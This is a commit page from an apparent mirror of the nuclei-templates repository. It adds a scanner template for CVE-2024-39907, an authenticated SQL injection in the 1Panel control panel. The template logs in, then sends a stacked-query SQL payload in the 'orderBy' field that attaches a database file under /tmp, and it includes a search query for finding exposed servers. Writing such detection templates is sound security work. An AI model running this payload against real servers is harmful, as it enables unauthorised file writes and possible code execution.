daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #10417 from projectdiscovery/CVE-2024-39907 

Create CVE-2024-39907.yaml
main
pussycat0x 2024-07-31 15:10:40 +05:30 committed by GitHub
parent 43b7fd14af cc1b9cb73e
commit dcf0280048
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
http/cves/2024/CVE-2024-39907.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-39907
info:
name: 1Panel SQL Injection - Authenticated
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
reference:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39907
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09387
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
tags: cve,cve2024,sqli,1panel,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/auth/login HTTP/1.1
Host: {{Hostname}}
EntranceCode: ZW50cmFuY2U=
Content-Type: application/json
{"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}
- |
POST /api/v1/hosts/command/search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_2, "SQL logic error","table exp already exists")
- contains(header_1, 'psession')
condition: and